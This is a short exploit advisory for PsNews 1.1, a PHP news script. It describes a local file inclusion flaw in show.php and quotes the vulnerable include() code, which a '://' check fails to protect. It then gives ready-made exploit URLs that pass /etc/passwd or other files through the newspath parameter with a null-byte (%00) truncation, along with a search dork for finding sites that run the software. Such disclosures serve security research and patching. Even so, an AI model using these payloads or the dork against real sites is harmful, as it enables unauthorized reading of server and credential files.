PsNews version 1.1 suffers from a local file inclusion vulnerability in show.php.
f9e9bb0aaed6591da5047f58c15869360ad6e3c3b6514b41f7b468102d0aab69
# o [bug] /"*._ _ #
# . . . .-*'` `*-.._.-'/ #
# o o < * )) , ( #
# . o `*-._`._(__.--*"`.\ #
# #
# vuln.: PsNews 1.1 (show.php newspath) Local File Inclusion #
# author: irk4z@yahoo.pl #
# download: #
# http://www.strefaphp.net/index.php?page=download&what=download&fid=12 #
# dork: "Powered by PsNews" ;] #
/news/show.php:
...
if(eregi("://", $newspath)){
die("Nieautoryzowany dostęp!");
}
if(!isset($newspath)){
$newspath = "news";
}
include("$newspath/functions.php");
...
# exploit:
http://[site]/[path]/news/show.php?newspath=/etc/passwd%00
http://[site]/[path]/news/show.php?newspath=[file]%00
# greetz: cOndemned, DooMRiderZ vx team (great zin :D), polish underground :*